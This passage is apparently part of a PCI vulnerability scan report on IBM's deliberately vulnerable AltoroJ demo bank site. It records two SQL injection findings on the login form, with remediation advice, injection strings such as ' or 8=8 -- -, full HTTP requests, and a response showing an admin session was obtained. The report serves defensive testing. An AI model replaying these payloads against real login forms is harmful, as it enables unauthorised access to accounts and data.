<a id="CatLink2" class="subheader"


href="index.jsp?content=business.htm">SMALL BUSINESS</a>
<ul class="sidebar">
<li><a id="MenuHyperLink7"
href="index.jsp?content=business_deposit.htm">Deposit
Products</a></li>
<li><a id="MenuHyperLink8"
href="index.jsp?content=business_lending.htm">Lending
Services</a></li>
<li><a id="MenuHyperLink9"
href="index.jsp?content=business_cards.htm">Cards</a></li>
<li><a id="MenuHyperLink10"
href="index.jsp?content=business_insurance.htm">Insurance</a></li
>
<li><a id="MenuHyperLink11"
href="index.jsp?content=business_retirement.htm">Retirement</a><
/li>
<li><a id="MenuHyperLink12"
href="index.jsp?content=business_other.htm">Other
Services</a></li>
</ul>

<a id="CatLink3" class="subheader"

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 60 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
content=inside_contact.htm">Contact Us</a></li>
<li><a id="MenuHyperLink15" href="cgi.exe"
>Locations</a></li>
<li><a id="MenuHyperLink16" href="index.jsp?
content=inside_investor.htm">Investor Relations</a></li>
<li><a id="MenuHyperLink17" href="index.jsp?
content=inside_press.htm">Press Room</a></li>
<li><a id="MenuHyperLink18" href="index.jsp?
content=inside_careers.htm">Careers</a></li>
<li><a id="MenuHyperLink19" href="
subscribe.jsp">Subscribe</a></li>
</ul>
</td>
<!-- TOC END -->

<td valign="top" colspan="3" class="bb">


<div class="fl" style="width: 99%;">

<h1>Online Banking Login</h1>

<!-- To get the latest admin login, please contact


SiteOps at 415-555-6159 -->
<p><span id="_ctl0__ctl0_Content_Main_message"
style="color:#FF0066;font-size:12pt;font-weight:bold;">
Login Failed: We're sorry, but this username or
password was not found in our system. Please try again.
</span></p>

<form action="doLogin" method="post" name="login"


id="login" onsubmit="return (confirminput(login));">
<table>
<tr>
<td>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 61 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Username:
</td>
<td>
<input type="text" id="uid" name="uid"
value="" style="width: 150px;">
</td>
<td>
</td>
</tr>
<tr>
<td>
Password:
</td>
<td>
<input type="password" id="passw" name="
passw" style="width: 150px;">
</td>
</tr>
<tr>
<td></td>
<td>
<input type="submit" name="btnSubmit"
value="Login">
</td>
</tr>
</table>
</form>

</div>

<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 62 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
document.login.uid.focus();
} else {
document.login.passw.focus();
}
}

function confirminput(myform) {
if (myform.uid.value.length && myform.
passw.value.length) {
return (true);
} else if (!(myform.uid.value.length)) {
myform.reset();
myform.uid.focus();
alert ("You must enter a valid username");
return (false);
} else {
myform.passw.focus();
alert ("You must enter a valid password");
return (false);
}
}
window.onload = setfocus;
</script>
</td>
</div>

<!-- BEGIN FOOTER -->

</tr>
</table>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 63 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
&copy;&nbsp;2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right">&nbsp;<a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
take advantage of advanced features</span></span>
<br><br><br>
<div class="disclaimer">
The AltoroJ website is published by IBM Corporation for the sole
purpose of
demonstrating the effectiveness of IBM products in detecting web
application
vulnerabilities and website defects. This site is not a real banking
site. Similarities,
if any, to third party products and/or websites are purely
coincidental. This site is
provided "as is" without warranty of any kind, either express or
implied. IBM does
not assume any risk in relation to your use of this website. For
more information,
please go to <a id="HyperLink7" href="http://www-142.ibm.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 64 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
com/software/products/us/en/subcategory/SWI10" >http://www-
142.ibm.com/software/products/us/en/subcategory/SWI10</a>.<br
/><br />

Copyright &copy; 2008, 2019, IBM Corporation, All rights reserved.


</div>
</div>

</body>
</html>
<!-- END FOOTER -->

Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
database instance. Before accepting any user-supplied data, the
application should validate this data's format and reject any characters
that are not explicitly allowed (i.e. a white-list). This list should be as
restrictive as possible. This is particularly important when the original
source of data is beyond the control of the application.

Please note that the listing of SQLi vulnerabilities is not an exhaustive


list, and other SQLi vulnerabilities may exist in the application.

4 SQL Injection Vulnerability 7.5 High Fail URL: https://demo.testfire.net:8443/doLogin


Port: tcp/8443

A SQL injection vulnerability (SQLi) was identified in this web

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 65 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
application. SQL injection is when modified SQL syntax is supplied to a
user defined parameter to have it query the SQL database directly,
which is not the desired intent of the web application. A simple proof
of concept example of this would be for a user to supply "' or SELECT
DATABASES;--" to a user defined parameter and then upon submission,
a list of databases on the system would be supplied for the user
because the SQL query was interpreted directly on the SQL server
instance. SQL injection can be found in many different forms and
combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All SQL Injection vulnerabilities are considered non-compliant by PCI.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: https

Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection

Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - https://demo.testfire.net:8443/doLogin - passw
False Injection: ' or 8=6 -- -
True Injection: ' or 8=8 -- -
True and false injections produced different responses
True Request: POST https://demo.testfire.net:8443/doLogin HTTP/1.1
Origin: https://demo.testfire.net:8443
Upgrade-Insecure-Requests: 1
Referer: https://demo.testfire.net:8443/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 66 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Content-Type: application/x-www-form-urlencoded

uid=CHSuser&passw=%27+or+8%3D8+--+-&btnSubmit=Login
True Response: HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Language: en
Content-Length: 1004
Date: Tue, 06 Aug 2019 04:37:47 GMT
Connection: close

<!doctype html><html lang="en"><head><title>HTTP Status 500 ?


Internal Server Error</title><style type="text/css">H1 {font-
family:Tahoma,Arial,sans-serif;color:white;background-
color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-
serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-
family:Tahoma,Arial,sans-serif;color:white;background-
color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-
serif;color:black;background-color:white;} B {font-
family:Tahoma,Arial,sans-serif;color:white;background-
color:#525D76;} P {font-family:Tahoma,Arial,sans-
serif;background:white;color:black;font-size:12px;}A {color :
black;}A.name {color : black;}HR {color :
#525D76;}</style></head><body><h1>HTTP Status 500 ? Internal
Server Error</h1><hr class="line" /><p><b>Type</b> Status
Report</p><p><b>Description</b> The server encountered an
unexpected condition that prevented it from fulfilling the
request.</p><hr class="line" /><h3>Apache
False Request: POST https://demo.testfire.net:8443/doLogin HTTP/1.1
Origin: https://demo.testfire.net:8443
Upgrade-Insecure-Requests: 1
Referer: https://demo.testfire.net:8443/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 67 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded

uid=CHSuser&passw=%27+or+8%3D6+--+-&btnSubmit=Login
False Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:37:47 GMT

<!-- BEGIN HEADER -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 68 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<div id="header" style="margin-bottom:5px; width: 99%;">
<form id="frmSearch" method="get" action="/search.jsp">
<table width="100%" border="0" cellpadding="0"
cellspacing="0">
<tr>
<td rowspan="2"><a id="HyperLink1" href="
/index.jsp"><img src="/images/logo.gif" width=283
height=80/></a></td>
<td align="right" valign="top">
<a id="LoginLink" href="/logout.jsp"><font
style="font-weight: bold; color: red;">Sign Off</font></a> | <a id="
HyperLink3" href="/index.jsp?content=inside_contact.htm">Contact
Us</a> | <a id="HyperLink4" href="/feedback.jsp">Feedback</a> |
<label for="txtSearch">Search</label>
<input type="text" name="query" id="query" accesskey="S" />
<input type="submit" value="Go" />
</td>
</tr>
<tr>
<td align="right" style="background-image:
url('/images/gradient.jpg');padding:0px;margin:0px;"><img src="
/images/header_pic.jpg" alt="" width=354 height=60/></td>
</tr>
</table>
</form>
</div>

<table cellspacing="0" width="100%">


<tr>
<td width="25%" class="bt br bb"><div id="Header1"><img id="
Image1" src="/images/pf_lock.gif" width=12 height=14 style="vertical-
align: bottom;" alt="Secure Login"/> &nbsp; <a id="AccountLink"
href="/bank/main.jsp" class="focus" >MY ACCOUNT</a></div></td>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 69 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<td width="25%" class="cc bt br bb"><div id="Header2"><a id="
LinkHeader2" class="focus" href="/index.jsp?content=personal.htm"
>PERSONAL</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header3"><a id="
LinkHeader3" class="focus" href="/index.jsp?content=business.htm"
>SMALL BUSINESS</a></div></td>
<td width="25%" class="cc bt bb"><div id="Header4"><a id="
LinkHeader4" class="focus" href="/index.jsp?content=inside.htm"
>INSIDE ALTORO MUTUAL</a></div></td>
</tr>
<tr>

<!-- END HEADER -->

<div id="wrapper" style="width: 99%;">

<!-- TOC BEGIN -->


<td valign="top" class="cc br bb">
<br style="line-height: 10px;"/>

<a id="CatLink1" class="subheader" href="index.jsp?


content=personal.htm">PERSONAL</a>
<ul class="sidebar">
<li><a id="MenuHyperLink1" href="index.jsp?
content=personal_deposit.htm">Deposit Product</a></li>
<li><a id="MenuHyperLink2" href="index.jsp?
content=personal_checking.htm">Checking</a></li>
<li><a id="MenuHyperLink3" href="index.jsp?
content=personal_loans.htm">Loan Products</a></li>
<li><a id="MenuHyperLink4" href="index.jsp?
content=personal_cards.htm">Cards</a></li>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 70 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<li><a id="MenuHyperLink5"
href="index.jsp?content=personal_investments.htm">Investments
&amp; Insurance</a></li>
<li><a id="MenuHyperLink6"
href="index.jsp?content=personal_other.htm">Other
Services</a></li>
</ul>

<a id="CatLink2" class="subheader"


href="index.jsp?content=business.htm">SMALL BUSINESS</a>
<ul class="sidebar">
<li><a id="MenuHyperLink7"
href="index.jsp?content=business_deposit.htm">Deposit
Products</a></li>
<li><a id="MenuHyperLink8"
href="index.jsp?content=business_lending.htm">Lending
Services</a></li>
<li><a id="MenuHyperLink9"
href="index.jsp?content=business_cards.htm">Cards</a></li>
<li><a id="MenuHyperLink10"
href="index.jsp?content=business_insurance.htm">Insurance</a></li
>
<li><a id="MenuHyperLink11"
href="index.jsp?content=business_retirement.htm">Retirement</a><
/li>
<li><a id="MenuHyperLink12"
href="index.jsp?content=business_other.htm">Other
Services</a></li>
</ul>

<a id="CatLink3" class="subheader"


href="index.jsp?content=inside.htm">INSIDE ALTORO MUTUAL</a>
<ul class="sidebar">
<li><a id="MenuHyperLink13"

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 71 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<li><a id="MenuHyperLink16" href="index.jsp?
content=inside_investor.htm">Investor Relations</a></li>
<li><a id="MenuHyperLink17" href="index.jsp?
content=inside_press.htm">Press Room</a></li>
<li><a id="MenuHyperLink18" href="index.jsp?
content=inside_careers.htm">Careers</a></li>
<li><a id="MenuHyperLink19" href="
subscribe.jsp">Subscribe</a></li>
</ul>
</td>
<!-- TOC END -->

<td valign="top" colspan="3" class="bb">


<div class="fl" style="width: 99%;">

<h1>Online Banking Login</h1>

<!-- To get the latest admin login, please contact


SiteOps at 415-555-6159 -->
<p><span id="_ctl0__ctl0_Content_Main_message"
style="color:#FF0066;font-size:12pt;font-weight:bold;">
Login Failed: We're sorry, but this username or
password was not found in our system. Please try again.
</span></p>

<form action="doLogin" method="post" name="login"


id="login" onsubmit="return (confirminput(login));">
<table>
<tr>
<td>
Username:
</td>
<td>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 72 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<input type="text" id="uid" name="uid"
value="" style="width: 150px;">
</td>
<td>
</td>
</tr>
<tr>
<td>
Password:
</td>
<td>
<input type="password" id="passw" name="
passw" style="width: 150px;">
</td>
</tr>
<tr>
<td></td>
<td>
<input type="submit" name="btnSubmit"
value="Login">
</td>
</tr>
</table>
</form>

</div>

<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {
document.login.uid.focus();
} else {
document.login.passw.focus();

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 73 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
}
}

function confirminput(myform) {
if (myform.uid.value.length && myform.
passw.value.length) {
return (true);
} else if (!(myform.uid.value.length)) {
myform.reset();
myform.uid.focus();
alert ("You must enter a valid username");
return (false);
} else {
myform.passw.focus();
alert ("You must enter a valid password");
return (false);
}
}
window.onload = setfocus;
</script>
</td>
</div>

<!-- BEGIN FOOTER -->

</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 74 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
&copy;&nbsp;2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right">&nbsp;<a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
take advantage of advanced features</span></span>
<br><br><br>
<div class="disclaimer">
The AltoroJ website is published by IBM Corporation for the sole
purpose of
demonstrating the effectiveness of IBM products in detecting web
application
vulnerabilities and website defects. This site is not a real banking
site. Similarities,
if any, to third party products and/or websites are purely
coincidental. This site is
provided "as is" without warranty of any kind, either express or
implied. IBM does
not assume any risk in relation to your use of this website. For
more information,
please go to <a id="HyperLink7" href="http://www-142.ibm.
com/software/products/us/en/subcategory/SWI10" >http://www-142.
ibm.com/software/products/us/en/subcategory/SWI10</a>.<br /><br
/>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 75 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

Copyright &copy; 2008, 2019, IBM Corporation, All rights reserved.


</div>
</div>

</body>
</html>
<!-- END FOOTER -->

Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
database instance. Before accepting any user-supplied data, the
application should validate this data's format and reject any characters
that are not explicitly allowed (i.e. a white-list). This list should be as
restrictive as possible. This is particularly important when the original
source of data is beyond the control of the application.

Please note that the listing of SQLi vulnerabilities is not an exhaustive


list, and other SQLi vulnerabilities may exist in the application.

5 SQL Injection Vulnerability 7.5 High Fail URL: https://demo.testfire.net:8443/doLogin


Port: tcp/8443

A SQL injection vulnerability (SQLi) was identified in this web


application. SQL injection is when modified SQL syntax is supplied to a
user defined parameter to have it query the SQL database directly,
which is not the desired intent of the web application. A simple proof

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 76 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
of concept example of this would be for a user to supply "' or SELECT
DATABASES;--" to a user defined parameter and then upon submission,
a list of databases on the system would be supplied for the user
because the SQL query was interpreted directly on the SQL server
instance. SQL injection can be found in many different forms and
combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All SQL Injection vulnerabilities are considered non-compliant by PCI.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: https

Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection

Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - https://demo.testfire.net:8443/doLogin - uid
False Injection: ' or 8=6 -- -
True Injection: ' or 8=8 -- -
True and false injections produced different responses
True Request: POST https://demo.testfire.net:8443/doLogin HTTP/1.1
Origin: https://demo.testfire.net:8443
Upgrade-Insecure-Requests: 1
Referer: https://demo.testfire.net:8443/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded

uid=%27+or+8%3D8+--+-&passw=Passwor1&btnSubmit=Login

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 77 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
True Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 6706
Date: Tue, 06 Aug 2019 04:37:44 GMT

<!-- BEGIN HEADER -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">

<div id="header" style="margin-bottom:5px; width: 99%;">


<form id="frmSearch" method="get" action="/search.jsp">
<table width="100%" border="0" cellpadding="0"
cellspacing="0">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 78 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<tr>
<td rowspan="2"><a id="HyperLink1" href="
/index.jsp"><img src="/images/logo.gif" width=283
height=80/></a></td>
<td align="right" valign="top">
<a id="LoginLink" href="/logout.jsp"><font
style="font-weight: bold; color: red;">Sign Off</font></a> | <a id="
HyperLink3" href="/index.jsp?content=inside_contact.htm">Contact
Us</a> | <a id="HyperLink4" href="/feedback.jsp">Feedback</a> |
<label for="txtSearch">Search</label>
<input type="text" name="query" id="query" accesskey="S" />
<input type="submit" value="Go" />
</td>
</tr>
<tr>
<td align="right" style="background-image:
url('/images/gradient.jpg');padding:0px;margin:0px;"><img src="
/images/header_pic.jpg" alt="" width=354 height=60/></td>
</tr>
</table>
</form>
</div>

<table cellspacing="0" width="100%">


<tr>
<td width="25%" class="bt br bb"><div id="Header1"><img id="
Image1" src="/images/pf_lock.gif" width=12 height=14 style="vertical-
align: bottom;" alt="Secure Login"/> &nbsp; <a id="AccountLink"
href="/bank/main.jsp" class="focus" >MY ACCOUNT</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header2"><a id="
LinkHeader2" class="focus" href="/index.jsp?content=personal.htm"
>PERSONAL</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header3"><a id="

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 79 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
LinkHeader3" class="focus" href="/index.jsp?content=business.htm"
>SMALL BUSINESS</a></div></td>
<td width="25%" class="cc bt bb"><div id="Header4"><a id="
LinkHeader4" class="focus" href="/index.jsp?content=inside.htm"
>INSIDE ALTORO MUTUAL</a></div></td>
</tr>
<tr>

<!-- END HEADER -->

<div id="wrapper" style="width: 99%;">


<!-- MEMBER TOC BEGIN -->

<table cellspacing="0" width="100%">

<td valign="top" class="cc br bb">


<br style="line-height: 10px;"/>
<b>I WANT TO ...</b>
<ul class="sidebar">
<li><a id="MenuHyperLink1" href="/bank/main.jsp">View
Account Summary</a></li>
<li><a id="MenuHyperLink2" href="/bank/transaction.jsp"
>View Recent Transactions</a></li>
<li><a id="MenuHyperLink3" href="/bank/transfer.jsp"
>Transfer Funds</a></li>
<!-- <li><a id="MenuHyperLink3" href="
/bank/stocks.jsp">Trade Stocks</a></li>-->

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 80 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

<li><a id="MenuHyperLink4" href="/bank/queryxpath.jsp"


>Search News Articles</a></li>
<li><a id="MenuHyperLink5" href="/bank/customize.jsp"
>Customize Site Language</a></li>
</ul>

<span id="_ctl0__ctl0_Content_Administration">
<br style="line-height: 10px;"/>
<b>ADMINISTRATION</b>
<ul class="sidebar">
<li><a href="/admin/admin.jsp"
>Edit Users</a></li>

</ul>
</span>

</td>
<!-- MEMBER TOC END -->
<td valign="top" colspan="3" class="bb">

<div class="fl" style="width: 99%;">

<h1>Hello Admin User


</h1>

<p>
Welcome to Altoro Mutual Online.
</p>

<form name="details" method="get" action="

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 81 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
showAccount">
<table border="0">
<TR valign="top">
<td>View Account Details:</td>
<td align="left">
<select size="1" name="listAccounts" id="
listAccounts">
<option value="800000" >800000
Corporate</option>
<option value="800001" >800001 Checking</option>
<option value="800002" >800002 Savings</option>
<option value="800003" >800003 Checking</option>
<option value="800004" >800004 Savings</option>
<option value="800005" >800005 Checking</option>
<option value="800006" >800006 Savings</option>
<option value="800007" >800007 Checking</option>
<option value="4539082039396288" >4539082039396288 Credit
Card</option>
